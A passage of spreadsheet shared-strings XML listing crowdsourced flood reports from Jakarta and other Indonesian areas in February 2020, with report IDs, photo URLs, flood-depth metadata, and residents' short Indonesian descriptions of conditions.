    <t>https://images.petabencana.id/a2856513-e83a-43bf-944a-c83ba90e3977.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 17 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2490", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Teluk gong selatan 3 , pukul 8 pagi</t>
  </si>
  <si>
    <t>073d72ed-1330-470d-b3c2-68592f3d8311</t>
  </si>
  <si>
    <t>https://images.petabencana.id/073d72ed-1330-470d-b3c2-68592f3d8311.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1796", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>efa843bd-90cf-40ec-aee4-85b97c1329dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/efa843bd-90cf-40ec-aee4-85b97c1329dc.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1709", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Video diambil pada pukul 6 30</t>
  </si>
  <si>
    <t>2b78a7fc-9067-4314-b546-a7ce3bcadf7b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2b78a7fc-9067-4314-b546-a7ce3bcadf7b.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 53, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2586", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>c30e29af-6feb-422d-88e5-9a89faaeceac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c30e29af-6feb-422d-88e5-9a89faaeceac.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2571", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pesing Koneng, Jakarta barat banjir. Ketinggian hingga se-lutut orang dewasa. Apakah ada tindak lanjut setelah ini? #banjir #jakarta2020"</t>
  </si>
  <si>
    <t>57589760-6b88-47fc-8ac8-235069e5d7e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/57589760-6b88-47fc-8ac8-235069e5d7e4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "720", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dengan kedalaman sekitar 35 cm - 50 cm Semakin kedepan (kearah jalan raya semakin dalam)"</t>
  </si>
  <si>
    <t>c05bb961-00c0-408c-84c1-2e4fa88415ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c05bb961-00c0-408c-84c1-2e4fa88415ee.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "650", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kebon Sirih</t>
  </si>
  <si>
    <t>51973722-7e9b-4954-bda5-08a912d8c4fb</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "133", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ini yang jalan durimas gimana yaa masss saya dikepung banjir iniii aelah</t>
  </si>
  <si>
    <t>1f1a5e5d-d37e-4ff3-8415-4b608527b323</t>
  </si>
  <si>
    <t>banjir pak anies! hujan bentar, banjir, dulu ga beginiiiiii ????</t>
  </si>
  <si>
    <t>0a36a1a0-f521-4cbb-b4b1-556dc91bdcd5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a36a1a0-f521-4cbb-b4b1-556dc91bdcd5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "149", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air belum surut,dekat kelurahan kedoya utara padahal, walaupun disini hitungannya kedoya selatan(perbatasan)</t>
  </si>
  <si>
    <t>94029403-2339-45cf-a741-f8a18887b12b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94029403-2339-45cf-a741-f8a18887b12b.jpg</t>
  </si>
  <si>
    <t>Karena aliran sungai meluap dan mengalir kepemukiman penduduk</t>
  </si>
  <si>
    <t>Pojok</t>
  </si>
  <si>
    <t>Mojogedang</t>
  </si>
  <si>
    <t>Karanganyar</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348524</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/02/15806190721830380439.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1964", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Melur Tugu Koja Tergenang Banjir</t>
  </si>
  <si>
    <t>Banjir menggenangi di Jalan Melur Tugu, Koja, Jakarta Utara.</t>
  </si>
  <si>
    <t>Tugu Utara</t>
  </si>
  <si>
    <t>Koja</t>
  </si>
  <si>
    <t>426543d6-8842-4f08-961b-8b3ea0c553b3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/426543d6-8842-4f08-961b-8b3ea0c553b3.jpg</t>
  </si>
  <si>
    <t>Hujan berlangsung sekitar 1 jam pada hari Sabtu, 2 Feb 2020 pukul 14:00 WIB, di Jalan Dewi Sartika Ciputat hingga terjadi banjir</t>
  </si>
  <si>
    <t>d3a26097-3f76-40ee-a3b6-0346f0dd7efd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d3a26097-3f76-40ee-a3b6-0346f0dd7efd.jpg</t>
  </si>
  <si>
    <t>Berharap bisa mengatasi banjir ini.</t>
  </si>
  <si>
    <t>Sidoklumpuk</t>
  </si>
  <si>
    <t>215e73d9-82e0-456c-a749-e21fcf70b2be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/215e73d9-82e0-456c-a749-e21fcf70b2be.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 77 }</t>
  </si>
  <si>
    <t>Banjir mengakibatkan kemacetan selama 4 jam didaerah ini. Banyak motor dan mobil mogok.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348558</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/03/1580699531806186160.jpg</t>
  </si>
  <si>
    <t>Kades Sukarandeg Beri Bantuan Untuk Korban Banjir</t>
  </si>
  <si>
    <t>Kepala Desa Sukarandeg beserta jajaran nya memberikan bantuan kepada korban banjir Dusun Serampang, Desa Sukarandeg kecamatan Sragi Provinsi Jawa Tengah, sudah lebih dari tiga hari banjir setinggi lutut orang dewasa menggenangi dusun tersebut. "semoga ba</t>
  </si>
  <si>
    <t>Kedaung</t>
  </si>
  <si>
    <t>Sragi</t>
  </si>
  <si>
    <t>Lampung Selatan</t>
  </si>
  <si>
    <t>Lampung</t>
  </si>
  <si>
    <t>3ce0b181-62ff-428f-b001-7d1b377373ba</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 1, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir semata kaki semut</t>
  </si>
  <si>
    <t>Pondok Benda</t>
  </si>
  <si>
    <t>ea228d0e-99a3-420b-8334-6e8d59b9d3b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ea228d0e-99a3-420b-8334-6e8d59b9d3b4.jpg</t>
  </si>
  <si>
    <t>Kondisi saat ini gelap karena listrik di padamkan demi menghindari korsleting.air masih menggenang di kawasan perumahan tersebut</t>
  </si>
  <si>
    <t>Pasir Gadung</t>
  </si>
  <si>
    <t>Cikupa</t>
  </si>
  <si>
    <t>f5787465-2fef-4059-8822-f03fc1aac985</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f5787465-2fef-4059-8822-f03fc1aac985.jpg</t>
  </si>
  <si>
    <t>Banjir gess</t>
  </si>
  <si>
    <t>Gerendeng</t>
  </si>
  <si>
    <t>dd5d4c93-26ba-4487-a98a-9b2ebb9956d8</t>
  </si>
  <si>
    <t>Banjir anjir</t>
  </si>
  <si>
    <t>Srimahi</t>
  </si>
  <si>
    <t>19fe4747-35c2-4327-9125-3a287cd443a8</t>
  </si>
  <si>
    <t>Banjir di Perumahan Griya Sangiang mas, mulai dari senin jam 1 siang sampai selasa sekarang</t>
  </si>
  <si>
    <t>Gebang Raya</t>
  </si>
  <si>
    <t>Periuk</t>
  </si>
  <si>
    <t>9363bf20-75cc-454a-a140-fdc69c7b6b33</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 47, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1516", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan deras disertai angin</t>
  </si>
  <si>
    <t>Pondok Ranggon</t>
  </si>
  <si>
    <t>193511b7-ed26-4474-a134-ced0d8b52558</t>
  </si>
  <si>
    <t>https://images.petabencana.id/193511b7-ed26-4474-a134-ced0d8b52558.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 45, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir emak emak ikkt cakeeebbb</t>
  </si>
  <si>
    <t>ecbda878-e2b0-4836-979d-95db2a9576e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ecbda878-e2b0-4836-979d-95db2a9576e4.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 106, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir ibu ibu ikkt ranting 04 satpamwal</t>
  </si>
  <si>
    <t>a36113bf-cc3c-4814-94c5-e1fe7b62f8b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a36113bf-cc3c-4814-94c5-e1fe7b62f8b7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "7214", "instance_region_code": "srg" }</t>
  </si>
  <si>
    <t>Wonosari</t>
  </si>
  <si>
    <t>Ngaliyan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348623</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/04/348623-1580808917782302339.mov-03.jpg</t>
  </si>
  <si>
    <t>Hujan Sejak Jam Satu Siang, Jl Kaktus Raya Banjir</t>
  </si>
  <si>
    <t>Banjir di Jl Kaktus Raya, Rancaekek, Bandung tepatnya di depan Sekolah Alam Pelopor. Hujan deras sejak jam 1 siang membuat jalanan banjir ditambah dengan selokan yang kian dangkal sehingga airnya meluap.</t>
  </si>
  <si>
    <t>Jelegong</t>
  </si>
  <si>
    <t>Rancaekek</t>
  </si>
  <si>
    <t>4b593ddc-0267-4fab-b96b-0c34b527543a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b593ddc-0267-4fab-b96b-0c34b527543a.jpg</t>
  </si>
  <si>
    <t>Yang ada di gambar itu di bagian depan. Lebih dalam lagi kalo di belakang rumah saya udah sekitar 12hari semenjak sebelum Iml</t>
  </si>
  <si>
    <t>f9e6a764-0cef-440d-9a80-139d23bdf2a8</t>
  </si>
  <si>
    <t>Mencoba 1</t>
  </si>
  <si>
    <t>ff70b846-6df6-4553-ab94-3652624cf641</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff70b846-6df6-4553-ab94-3652624cf641.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 84 }</t>
  </si>
  <si>
    <t>Hujan kemarin mengkikis tembok samping rumah,  air sudah merembes ke dalam rumah. Tolong ??</t>
  </si>
  <si>
    <t>Kebon Pisang</t>
  </si>
  <si>
    <t>9440c13f-2c7f-4979-9fe9-e95e0b0ad76c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9440c13f-2c7f-4979-9fe9-e95e0b0ad76c.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 29 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1168", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ngetes aja</t>
  </si>
  <si>
    <t>Pela Mampang</t>
  </si>
  <si>
    <t>d6ed719d-1977-4c19-9961-19db2bbdc8f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d6ed719d-1977-4c19-9961-19db2bbdc8f9.jpg</t>
  </si>
  <si>
    <t>Selalu banjir dan jalan berlubang</t>
  </si>
  <si>
    <t>Pabuaran</t>
  </si>
  <si>
    <t>Bojong Gede</t>
  </si>
  <si>
    <t>0e40b9de-c1e1-4ff8-a9a1-4855cdd7953d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0e40b9de-c1e1-4ff8-a9a1-4855cdd7953d.jpg</t>
  </si>
  <si>
    <t>Lokasi Mural, Inter Klaster NTB</t>
  </si>
  <si>
    <t>Jempong Baru</t>
  </si>
  <si>
    <t>Sekarbela</t>
  </si>
  <si>
    <t>Mataram</t>
  </si>
  <si>
    <t>Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>90977802-76ff-4c90-aa7e-f89d4faeb68f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/90977802-76ff-4c90-aa7e-f89d4faeb68f.jpg</t>
  </si>
  <si>
    <t>34ceb24c-efc8-496f-8b8b-e0315ddbaeb6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34ceb24c-efc8-496f-8b8b-e0315ddbaeb6.jpg</t>
  </si>
  <si>
    <t>Itu banjir dikomplek saya, yang saya tunjukan lokasinya, sudah lebih dalam lagi</t>
  </si>
  <si>
    <t>Bojongloa</t>
  </si>
  <si>
    <t>b0c91179-05e0-480f-ba7a-f79075df4a89</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0c91179-05e0-480f-ba7a-f79075df4a89.jpg</t>
  </si>
  <si>
    <t>Rancaekek Wetan</t>
  </si>
  <si>
    <t>97d6dfdb-aa29-4d8e-a635-7f808a3cc037</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 51 }</t>
  </si>
  <si>
    <t>e24824fe-475c-4281-8c64-f706a15e2b15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e24824fe-475c-4281-8c64-f706a15e2b15.jpg</t>
  </si>
  <si>
    <t>Hujan banjir melanda kawasan cinunuk cileunyi bandung diperumahan permata biru</t>
  </si>
  <si>
    <t>Cinunuk</t>
  </si>
  <si>
    <t>Cileunyi</t>
  </si>
  <si>
    <t>1f2dfb5e-3442-4dd5-8c4d-8863cf0765ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f2dfb5e-3442-4dd5-8c4d-8863cf0765ea.jpg</t>
  </si>
  <si>
    <t>Berawal pada pukul 13.00 hujan lebat hingga pukul 17.00 dan masih gerimis sampai malam hari mengakibatkan banjir</t>
  </si>
  <si>
    <t>6f371ffb-42bf-4431-9bc7-40f1a58a132f</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 81, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1491", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir elahhh bantuin</t>
  </si>
  <si>
    <t>6734c8cf-a3b4-4ee1-89f6-075d663601b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6734c8cf-a3b4-4ee1-89f6-075d663601b7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1408", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir semata kaki. Ujan berenti bakal surut, ga berenti tambah tinggi</t>
  </si>
  <si>
    <t>15ef0a97-889f-4f68-a59f-87225e14b7c8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/15ef0a97-889f-4f68-a59f-87225e14b7c8.jpg</t>
  </si>
  <si>
    <t>Perum taman kota bekasi</t>
  </si>
  <si>
    <t>Bekasi Jaya</t>
  </si>
  <si>
    <t>a96f3e61-0980-46e5-ae16-b4ad4c35beda</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a96f3e61-0980-46e5-ae16-b4ad4c35beda.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 180 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "166", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>dalem rumah sama luar rumah beda tingginya</t>
  </si>
  <si>
    <t>Sukabumi Selatan</t>
  </si>
  <si>
    <t>ee6822b3-18f1-4b34-862d-374ae85ba938</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ee6822b3-18f1-4b34-862d-374ae85ba938.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2034", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>0d84883e-e892-4388-94bc-1eb21b40dc38</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 34 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1845", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah masuk rumah kiraa 30 cm</t>
  </si>
  <si>
    <t>761860f0-bcb1-4c7f-98c3-d2685c70008c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/761860f0-bcb1-4c7f-98c3-d2685c70008c.jpg</t>
  </si>
  <si>
    <t>d1763d61-3c9d-4f3d-972e-980d1e419043</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d1763d61-3c9d-4f3d-972e-980d1e419043.jpg</t>
  </si>
  <si>
    <t>Duren jaya bekasi timur</t>
  </si>
  <si>
    <t>45284bf0-b043-4e1b-9894-aab8b34c2514</t>
  </si>
  <si>
    <t>https://images.petabencana.id/45284bf0-b043-4e1b-9894-aab8b34c2514.jpg</t>
  </si>
  <si>
    <t>Banjir semata kaki, kalo deres ampe jam 9 bisa bisa masuk rumah</t>
  </si>
  <si>
    <t>75f6f1fd-e6a0-4afe-a0eb-df89b26e2a81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75f6f1fd-e6a0-4afe-a0eb-df89b26e2a81.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "969", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jln Gatot Subroto pagi ini</t>
  </si>
  <si>
    <t>Gandaria Utara</t>
  </si>
  <si>
    <t>0569a1ef-8fd4-4545-896a-9a2bd68cae55</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0569a1ef-8fd4-4545-896a-9a2bd68cae55.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "566", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir.</t>
  </si>
  <si>
    <t>b568d532-15bb-4bfe-80f4-ab2b157539b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b568d532-15bb-4bfe-80f4-ab2b157539b1.jpg</t>
  </si>
  <si>
    <t>Banjir siaga 2 di Jatinegara Jakarta timur</t>
  </si>
  <si>
    <t>668f2fc4-eafb-4636-ad62-1acc6dc26480</t>
  </si>
  <si>
    <t>https://images.petabencana.id/668f2fc4-eafb-4636-ad62-1acc6dc26480.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2307", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jln arus dalam RT 08 RW 001 Kelurahan Cawang kecamatan Kramat jati//sampai saat ini masih masuk terus"</t>
  </si>
  <si>
    <t>3d0ece39-7a89-492e-84a9-40aeed734842</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3d0ece39-7a89-492e-84a9-40aeed734842.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2553", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir lagi....... Gada kedengeran suara orang teriaks pake TOA ya bijimana neh wan Aibon ????</t>
  </si>
  <si>
    <t>Pademangan Barat</t>
  </si>
  <si>
    <t>Pademangan</t>
  </si>
  <si>
    <t>3b141d3f-a613-4530-bd34-d33fc5e0693b</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2284", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir saat ini se mata kaki</t>
  </si>
  <si>
    <t>156042ea-b1cd-482c-8f0c-df2b375e5edd</t>
  </si>
  <si>
    <t>Jatiwaringin antilope banjir karena hujan yang cukup deras dari semalam</t>
  </si>
  <si>
    <t>c230d6ac-3c4e-4d68-ab24-7b0d8ac3b2f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c230d6ac-3c4e-4d68-ab24-7b0d8ac3b2f4.jpg</t>
  </si>
  <si>
    <t>Jatimakmur</t>
  </si>
  <si>
    <t>b6ddde44-b65b-47f5-af9b-61d41b611702</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b6ddde44-b65b-47f5-af9b-61d41b611702.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "576", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>999e8d10-55b8-4e51-8cb3-4439f5e1b657</t>
  </si>
  <si>
    <t>Air luapan dari got</t>
  </si>
  <si>
    <t>3c97b1aa-ece5-4265-af30-d1fcd71cb797</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c97b1aa-ece5-4265-af30-d1fcd71cb797.jpg</t>
  </si>
  <si>
    <t>Komplek puri asih sejahtera, bekasi selatan</t>
  </si>
  <si>
    <t>Jaka Setia</t>
  </si>
  <si>
    <t>85b2d2cb-62d6-4c0d-a767-54f8897786be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/85b2d2cb-62d6-4c0d-a767-54f8897786be.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1473", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Baiklah Jakarta, kau punya cerita apa lagi hari ini ?. #banjir</t>
  </si>
  <si>
    <t>Pulo Gebang</t>
  </si>
  <si>
    <t>1488c7eb-fc8c-45cd-b12f-f1d49219eb19</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1488c7eb-fc8c-45cd-b12f-f1d49219eb19.jpg</t>
  </si>
  <si>
    <t>Banjir tambah tinggi sampai pagi, ini yang paling parah dari banjir-banjir kemarin</t>
  </si>
  <si>
    <t>46e5aa63-c349-45e9-96f2-4a39e6405b16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46e5aa63-c349-45e9-96f2-4a39e6405b16.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 62, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2056", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan dr semalam ga berentik ampe sekarang!</t>
  </si>
  <si>
    <t>b4b87ea7-c01a-4362-9f98-6b84ae02016a</t>
  </si>
  <si>
    <t>tolong, pompa penyedotnya yang di jakarta garden city diperbanyak supaya banjirnya berkurang sedikit demi sedikit</t>
  </si>
  <si>
    <t>4dda75f0-d8c8-4d28-bf35-fbe33f85894b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4dda75f0-d8c8-4d28-bf35-fbe33f85894b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1201", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di kompleks pejaten indah, tanggul yang rusak di January 2020 belum diperbaikin sehingga banjir cepat masuk rumah. SOS</t>
  </si>
  <si>
    <t>Kalibata</t>
  </si>
  <si>
    <t>7ff9adf6-0b41-4b57-94c1-b7bf6c52f97f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ff9adf6-0b41-4b57-94c1-b7bf6c52f97f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2275", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir se lutut orag dewasa, hujan sejak jam 3 pagi.</t>
  </si>
  <si>
    <t>f57e5d79-adce-417e-891d-5b27b86007a2</t>
  </si>
  <si>
    <t>Perumahan Sunter Indah, Sunter Jaya - Jakarta Utara banjir 20-30 cm</t>
  </si>
  <si>
    <t>f253f8d1-df19-48c2-b2e9-e6960d943fea</t>
  </si>
  <si>
    <t>AIR SUDAH MULAI MENGGENANG SEBATAS BETIS</t>
  </si>
  <si>
    <t>f70f080e-a71f-438b-a8a6-30a123361662</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f70f080e-a71f-438b-a8a6-30a123361662.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2688", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kalo depan rumah segini biasanya depan perumahan lebih parah</t>
  </si>
  <si>
    <t>Suka Pura</t>
  </si>
  <si>
    <t>Cilincing</t>
  </si>
  <si>
    <t>75eed336-9ce8-4596-a460-727ce419aa93</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75eed336-9ce8-4596-a460-727ce419aa93.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2107", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kayu Putih</t>
  </si>
  <si>
    <t>5a6c399c-3e88-4594-85e1-e2a09f70aa38</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a6c399c-3e88-4594-85e1-e2a09f70aa38.jpg</t>
  </si>
  <si>
    <t>e4d06686-7db4-4d11-b649-ae40e011062d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e4d06686-7db4-4d11-b649-ae40e011062d.jpg</t>
  </si>
  <si>
    <t>Banjir setengah dengkul di kelapa gading</t>
  </si>
  <si>
    <t>15081ef3-2cdb-4cbe-847c-0cf9b9b66256</t>
  </si>
  <si>
    <t>Duren sawit kompleks ptb</t>
  </si>
  <si>
    <t>38a84c85-013f-4057-8c7f-0d97baf66b30</t>
  </si>
  <si>
    <t>https://images.petabencana.id/38a84c85-013f-4057-8c7f-0d97baf66b30.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 95 }</t>
  </si>
  <si>
    <t>009b0f92-7dff-4ead-b70c-c5e5ff196884</t>
  </si>
  <si>
    <t>https://images.petabencana.id/009b0f92-7dff-4ead-b70c-c5e5ff196884.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "245", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kompleks Griya Agung Permai</t>
  </si>
  <si>
    <t>4047a3f1-e48f-4212-9028-2619f5844d56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4047a3f1-e48f-4212-9028-2619f5844d56.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 61 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2111", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t xml:space="preserve">08-02-2020. 06:14 #banjir Kali belakang RS Mediros meluap. Jl Perintis Kemerdekaan dari arah Pulo Gadung sudah tidak bisa dilewati motor </t>
  </si>
  <si>
    <t>5cbea607-a63b-4642-a531-216708c24d5d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5cbea607-a63b-4642-a531-216708c24d5d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1502", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ketinggian semakin meningkat sangat signifikan , untuk sementara ketinggian mencapai 150cm lebih</t>
  </si>
  <si>
    <t>Rawa Terate</t>
  </si>
  <si>
    <t>f32ed1e1-7c80-4cde-b854-e0c001195c32</t>
  </si>
  <si>
    <t>Jalan Laskar Pemukiman belakang mall revo town ujan deres sedikit pasti banjir :"") Efek pembagunan tp  sanitasi pembuangan air nya ga bagus"</t>
  </si>
  <si>
    <t>Pekayon Jaya</t>
  </si>
  <si>
    <t>aa034f66-88f7-4bd8-80a3-17dfefdf2772</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2189", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Kodamar depan Masjid Al Mustaqim</t>
  </si>
  <si>
    <t>ffd72971-0930-4403-9c57-c3ed40022539</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ffd72971-0930-4403-9c57-c3ed40022539.jpg</t>
  </si>
  <si>
    <t>Asrama polisi kemanyoran rt03 rw 09</t>
  </si>
  <si>
    <t>b55df51b-aff3-4815-8a8e-fdc279d9e792</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b55df51b-aff3-4815-8a8e-fdc279d9e792.jpg</t>
  </si>
  <si>
    <t>komplek tni al kodamar</t>
  </si>
  <si>
    <t>4d2377fd-253c-46a7-b365-dc98a59de09f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d2377fd-253c-46a7-b365-dc98a59de09f.jpg</t>
  </si>
  <si>
    <t>Jatibening Baru</t>
  </si>
  <si>
    <t>ce73f156-e0b2-4685-83d6-789f3d290dda</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ce73f156-e0b2-4685-83d6-789f3d290dda.jpg</t>
  </si>
  <si>
    <t>Cempaka baru tengah banjir setinggi mata kaki 8 Feb 2020 pukul 6.30"</t>
  </si>
  <si>
    <t>deb040f4-6d13-4066-ae1e-6ec93a885afc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/deb040f4-6d13-4066-ae1e-6ec93a885afc.jpg</t>
  </si>
  <si>
    <t>08/02/2020, 05.50 WIB Banjir dengan kedalaman kurang lebih 47cm di jl. Ori raya 1, pd. Bambu, Kec. Duren sawit, jakrta timur</t>
  </si>
  <si>
    <t>0c057a13-3009-4632-8d45-1c8504144a27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0c057a13-3009-4632-8d45-1c8504144a27.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "463", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sekitar 50cm di daerah cempaka putih barat, jalarta pusat</t>
  </si>
  <si>
    <t>Cempaka Putih Barat</t>
  </si>
  <si>
    <t>a96e1fc1-37f2-4a91-8529-8f702c6f4b26</t>
  </si>
  <si>
